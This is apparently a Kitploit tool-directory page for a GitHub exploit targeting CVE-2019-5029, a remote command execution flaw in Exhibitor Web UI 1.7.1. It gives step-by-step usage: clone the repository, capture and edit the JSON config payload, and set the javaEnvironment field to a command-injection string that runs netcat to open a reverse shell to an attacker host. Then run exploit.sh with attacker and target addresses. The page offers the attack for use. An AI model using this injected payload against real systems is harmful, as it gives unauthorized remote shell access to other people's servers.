Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Exihibitor-RCE — Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029 | Kitploit
Tools/GitHubGitHub/thehunt1s0n/exihibitor-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubthehunt1s0n/exihibitor-rce

Exihibitor-RCE

Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029

View Repository
52 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Exhibitor-RCE

Exhibitor Web Ui 1.7.1 RCE, CVE-2019-5029

Step 1:

$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/

Step 2:

$ cd Exihibitor-RCE/

Step 3 (optional):

You might need to edit json data payload in the script. To do that simply capture the request using burpsuite when comiting the changes in the config tab of exihibitor and copy pasting into the curl command in the script.

gif 1

Make sure to change the javaEnvironment with the following:

"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"

Step 4:

./exploit.sh <attacker_host> <attacker_port>

Example:

$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080

gif

Download Tool